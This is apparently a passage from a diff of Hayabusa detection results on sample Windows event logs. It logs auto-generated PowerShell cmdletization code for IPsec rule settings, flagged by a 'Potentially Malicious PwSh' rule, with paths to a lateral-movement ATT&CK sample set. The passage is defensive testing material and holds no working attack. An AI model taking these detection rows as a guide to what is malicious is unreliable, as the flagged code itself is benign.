${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In';,../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,abled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In';,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = 